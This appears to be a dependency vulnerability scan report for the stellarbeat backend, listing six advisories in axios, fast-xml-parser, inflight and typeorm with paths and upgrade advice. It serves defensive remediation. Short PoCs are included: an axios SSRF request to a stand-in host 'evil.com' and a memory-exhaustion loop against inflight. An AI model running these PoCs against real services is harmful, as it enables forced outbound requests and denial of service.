Vulnerabilities	6 via 49 paths
Dependencies	379
Source	GitHub
Commit	f189235f

Find, fix and prevent vulnerabilities in your code.

Test and protect my applications

Severity

Critical
High
1
Medium
5
Low

Status

Open
6
Patched
0
Ignored
0

high severity

new

Uncaught Exception

Vulnerable module: fast-xml-parser
Introduced through: @aws-sdk/client-s3@3.980.0

Detailed paths

Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/middleware-user-agent@3.972.5 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/middleware-flexible-checksums@3.972.3 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/middleware-sdk-s3@3.972.5 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/credential-provider-node@3.972.4 › @aws-sdk/credential-provider-env@3.972.3 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/credential-provider-node@3.972.4 › @aws-sdk/credential-provider-http@3.972.5 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/util-user-agent-node@3.972.3 › @aws-sdk/middleware-user-agent@3.972.5 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/credential-provider-node@3.972.4 › @aws-sdk/credential-provider-process@3.972.3 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/credential-provider-node@3.972.4 › @aws-sdk/credential-provider-sso@3.972.3 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/credential-provider-node@3.972.4 › @aws-sdk/credential-provider-web-identity@3.972.3 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/credential-provider-node@3.972.4 › @aws-sdk/credential-provider-ini@3.972.3 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/signature-v4-multi-region@3.980.0 › @aws-sdk/middleware-sdk-s3@3.972.5 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/credential-provider-node@3.972.4 › @aws-sdk/credential-provider-ini@3.972.3 › @aws-sdk/credential-provider-env@3.972.3 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/credential-provider-node@3.972.4 › @aws-sdk/credential-provider-ini@3.972.3 › @aws-sdk/credential-provider-http@3.972.5 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/credential-provider-node@3.972.4 › @aws-sdk/credential-provider-web-identity@3.972.3 › @aws-sdk/nested-clients@3.980.0 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/credential-provider-node@3.972.4 › @aws-sdk/credential-provider-ini@3.972.3 › @aws-sdk/nested-clients@3.980.0 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/credential-provider-node@3.972.4 › @aws-sdk/credential-provider-ini@3.972.3 › @aws-sdk/credential-provider-login@3.972.3 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/credential-provider-node@3.972.4 › @aws-sdk/credential-provider-ini@3.972.3 › @aws-sdk/credential-provider-process@3.972.3 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/credential-provider-node@3.972.4 › @aws-sdk/credential-provider-sso@3.972.3 › @aws-sdk/client-sso@3.980.0 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/credential-provider-node@3.972.4 › @aws-sdk/credential-provider-sso@3.972.3 › @aws-sdk/token-providers@3.980.0 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/credential-provider-node@3.972.4 › @aws-sdk/credential-provider-ini@3.972.3 › @aws-sdk/credential-provider-sso@3.972.3 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/credential-provider-node@3.972.4 › @aws-sdk/credential-provider-ini@3.972.3 › @aws-sdk/credential-provider-web-identity@3.972.3 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/credential-provider-node@3.972.4 › @aws-sdk/credential-provider-web-identity@3.972.3 › @aws-sdk/nested-clients@3.980.0 › @aws-sdk/middleware-user-agent@3.972.5 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/credential-provider-node@3.972.4 › @aws-sdk/credential-provider-ini@3.972.3 › @aws-sdk/nested-clients@3.980.0 › @aws-sdk/middleware-user-agent@3.972.5 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/credential-provider-node@3.972.4 › @aws-sdk/credential-provider-sso@3.972.3 › @aws-sdk/client-sso@3.980.0 › @aws-sdk/middleware-user-agent@3.972.5 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/credential-provider-node@3.972.4 › @aws-sdk/credential-provider-ini@3.972.3 › @aws-sdk/credential-provider-login@3.972.3 › @aws-sdk/nested-clients@3.980.0 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/credential-provider-node@3.972.4 › @aws-sdk/credential-provider-sso@3.972.3 › @aws-sdk/token-providers@3.980.0 › @aws-sdk/nested-clients@3.980.0 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/credential-provider-node@3.972.4 › @aws-sdk/credential-provider-ini@3.972.3 › @aws-sdk/credential-provider-web-identity@3.972.3 › @aws-sdk/nested-clients@3.980.0 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/credential-provider-node@3.972.4 › @aws-sdk/credential-provider-ini@3.972.3 › @aws-sdk/credential-provider-sso@3.972.3 › @aws-sdk/client-sso@3.980.0 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/credential-provider-node@3.972.4 › @aws-sdk/credential-provider-ini@3.972.3 › @aws-sdk/credential-provider-sso@3.972.3 › @aws-sdk/token-providers@3.980.0 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/credential-provider-node@3.972.4 › @aws-sdk/credential-provider-web-identity@3.972.3 › @aws-sdk/nested-clients@3.980.0 › @aws-sdk/util-user-agent-node@3.972.3 › @aws-sdk/middleware-user-agent@3.972.5 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/credential-provider-node@3.972.4 › @aws-sdk/credential-provider-ini@3.972.3 › @aws-sdk/nested-clients@3.980.0 › @aws-sdk/util-user-agent-node@3.972.3 › @aws-sdk/middleware-user-agent@3.972.5 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/credential-provider-node@3.972.4 › @aws-sdk/credential-provider-sso@3.972.3 › @aws-sdk/client-sso@3.980.0 › @aws-sdk/util-user-agent-node@3.972.3 › @aws-sdk/middleware-user-agent@3.972.5 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/credential-provider-node@3.972.4 › @aws-sdk/credential-provider-ini@3.972.3 › @aws-sdk/credential-provider-login@3.972.3 › @aws-sdk/nested-clients@3.980.0 › @aws-sdk/middleware-user-agent@3.972.5 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/credential-provider-node@3.972.4 › @aws-sdk/credential-provider-sso@3.972.3 › @aws-sdk/token-providers@3.980.0 › @aws-sdk/nested-clients@3.980.0 › @aws-sdk/middleware-user-agent@3.972.5 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/credential-provider-node@3.972.4 › @aws-sdk/credential-provider-ini@3.972.3 › @aws-sdk/credential-provider-web-identity@3.972.3 › @aws-sdk/nested-clients@3.980.0 › @aws-sdk/middleware-user-agent@3.972.5 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/credential-provider-node@3.972.4 › @aws-sdk/credential-provider-ini@3.972.3 › @aws-sdk/credential-provider-sso@3.972.3 › @aws-sdk/client-sso@3.980.0 › @aws-sdk/middleware-user-agent@3.972.5 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/credential-provider-node@3.972.4 › @aws-sdk/credential-provider-ini@3.972.3 › @aws-sdk/credential-provider-sso@3.972.3 › @aws-sdk/token-providers@3.980.0 › @aws-sdk/nested-clients@3.980.0 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/credential-provider-node@3.972.4 › @aws-sdk/credential-provider-ini@3.972.3 › @aws-sdk/credential-provider-login@3.972.3 › @aws-sdk/nested-clients@3.980.0 › @aws-sdk/util-user-agent-node@3.972.3 › @aws-sdk/middleware-user-agent@3.972.5 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/credential-provider-node@3.972.4 › @aws-sdk/credential-provider-sso@3.972.3 › @aws-sdk/token-providers@3.980.0 › @aws-sdk/nested-clients@3.980.0 › @aws-sdk/util-user-agent-node@3.972.3 › @aws-sdk/middleware-user-agent@3.972.5 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/credential-provider-node@3.972.4 › @aws-sdk/credential-provider-ini@3.972.3 › @aws-sdk/credential-provider-web-identity@3.972.3 › @aws-sdk/nested-clients@3.980.0 › @aws-sdk/util-user-agent-node@3.972.3 › @aws-sdk/middleware-user-agent@3.972.5 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/credential-provider-node@3.972.4 › @aws-sdk/credential-provider-ini@3.972.3 › @aws-sdk/credential-provider-sso@3.972.3 › @aws-sdk/client-sso@3.980.0 › @aws-sdk/util-user-agent-node@3.972.3 › @aws-sdk/middleware-user-agent@3.972.5 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/credential-provider-node@3.972.4 › @aws-sdk/credential-provider-ini@3.972.3 › @aws-sdk/credential-provider-sso@3.972.3 › @aws-sdk/token-providers@3.980.0 › @aws-sdk/nested-clients@3.980.0 › @aws-sdk/middleware-user-agent@3.972.5 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5
Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › @aws-sdk/client-s3@3.980.0 › @aws-sdk/credential-provider-node@3.972.4 › @aws-sdk/credential-provider-ini@3.972.3 › @aws-sdk/credential-provider-sso@3.972.3 › @aws-sdk/token-providers@3.980.0 › @aws-sdk/nested-clients@3.980.0 › @aws-sdk/util-user-agent-node@3.972.3 › @aws-sdk/middleware-user-agent@3.972.5 › @aws-sdk/core@3.973.5 › @aws-sdk/xml-builder@3.972.2 › fast-xml-parser@5.2.5

Overview

fast-xml-parser is a Validate XML, Parse XML, Build XML without C/C++ based libraries

Affected versions of this package are vulnerable to Uncaught Exception in the numeric entity processing when parsing XML containing out-of-range entity code points. An attacker can cause the application to crash by submitting specially crafted XML input that triggers an uncaught exception.

Remediation

Upgrade fast-xml-parser to version 5.3.4 or higher.

References

Uncaught Exception vulnerability report

medium severity

Allocation of Resources Without Limits or Throttling

Vulnerable module: axios
Introduced through: axios@1.7.7

Detailed paths

Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › axios@1.7.7

Remediation: Upgrade to axios@1.12.0.

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via the data: URL handler. An attacker can trigger a denial of service by crafting a data: URL with an excessive payload, causing allocation of memory for content decoding before verifying content size limits.

Remediation

Upgrade axios to version 1.12.0 or higher.

References

GitHub Commit

Allocation of Resources Without Limits or Throttling vulnerability report

medium severity

Server-side Request Forgery (SSRF)

Vulnerable module: axios
Introduced through: axios@1.7.7

Detailed paths

Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › axios@1.7.7

Remediation: Upgrade to axios@1.8.2.

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) due to the allowAbsoluteUrls attribute being ignored in the call to the buildFullPath function from the HTTP adapter. An attacker could launch SSRF attacks or exfiltrate sensitive data by tricking applications into sending requests to malicious endpoints.

PoC

const axios = require('axios');
const client = axios.create({baseURL: 'http://example.com/', allowAbsoluteUrls: false});
client.get('http://evil.com');

Remediation

Upgrade axios to version 0.30.0, 1.8.2 or higher.

References

Server-side Request Forgery (SSRF) vulnerability report

medium severity

Server-side Request Forgery (SSRF)

Vulnerable module: axios
Introduced through: axios@1.7.7

Detailed paths

Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › axios@1.7.7

Remediation: Upgrade to axios@1.8.3.

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) due to not setting allowAbsoluteUrls to false by default when processing a requested URL in buildFullPath(). It may not be obvious that this value is being used with the less safe default, and URLs that are expected to be blocked may be accepted. This is a bypass of the fix for the vulnerability described in CVE-2025-27152.

Remediation

Upgrade axios to version 0.30.0, 1.8.3 or higher.

References

Server-side Request Forgery (SSRF) vulnerability report

medium severity

Missing Release of Resource after Effective Lifetime

Vulnerable module: inflight
Introduced through: typeorm@0.3.17

Detailed paths

Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › typeorm@0.3.17 › glob@8.1.0 › inflight@1.0.6

Overview

Affected versions of this package are vulnerable to Missing Release of Resource after Effective Lifetime via the makeres function due to improperly deleting keys from the reqs object after execution of callbacks. This behavior causes the keys to remain in the reqs object, which leads to resource exhaustion.

Exploiting this vulnerability results in crashing the node process or in the application crash.

Note: This library is not maintained, and currently, there is no fix for this issue. To overcome this vulnerability, several dependent packages have eliminated the use of this library.

To trigger the memory leak, an attacker would need to have the ability to execute or influence the asynchronous operations that use the inflight module within the application. This typically requires access to the internal workings of the server or application, which is not commonly exposed to remote users. Therefore, “Attack vector” is marked as “Local”.

PoC

const inflight = require('inflight');

function testInflight() {
  let i = 0;
  function scheduleNext() {
    let key = `key-${i++}`;
    const callback = () => {
    };
    for (let j = 0; j < 1000000; j++) {
      inflight(key, callback);
    }

    setImmediate(scheduleNext);
  }


  if (i % 100 === 0) {
    console.log(process.memoryUsage());
  }

  scheduleNext();
}

testInflight();

Remediation

There is no fixed version for inflight.

References

Missing Release of Resource after Effective Lifetime vulnerability report

medium severity

SQL Injection

Vulnerable module: typeorm
Introduced through: typeorm@0.3.17

Detailed paths

Introduced through: @stellarbeat/js-stellarbeat-backend@stellarbeat/js-stellarbeat-backend#f189235f7dee1ea139b0b5dff90e0c8f49280fd7 › typeorm@0.3.17

Remediation: Upgrade to typeorm@0.3.26.

Overview

typeorm is an ORM that can run in NodeJS, Browser, Cordova, PhoneGap, Ionic, React Native, NativeScript, Expo, and Electron platforms and can be used with TypeScript and JavaScript (ES5, ES6, ES7, ES8).

Affected versions of this package are vulnerable to SQL Injection via the repository.save or repository.update features when processing crafted input, due to improper handling in the sqlstring call with stringifyObjects set to false. An attacker can execute arbitrary SQL commands to bypass field-level update restrictions for columns such as user roles, by supplying specially crafted nested JSON.

Remediation

Upgrade typeorm to version 0.3.26 or higher.

References

SQL Injection vulnerability report

Vulnerabilities

Dependencies

Source

Commit

Find, fix and prevent vulnerabilities in your code.

high severity new

Uncaught Exception

Detailed paths

Overview

Remediation

References

medium severity

Allocation of Resources Without Limits or Throttling

Detailed paths

Overview

Remediation

References

medium severity

Server-side Request Forgery (SSRF)

Detailed paths

Overview

PoC

Remediation

References

medium severity

Server-side Request Forgery (SSRF)

Detailed paths

Overview

Remediation

References

medium severity

Missing Release of Resource after Effective Lifetime

Detailed paths

Overview

PoC

Remediation

References

medium severity

SQL Injection

Detailed paths

Overview

Remediation

References

high severity

new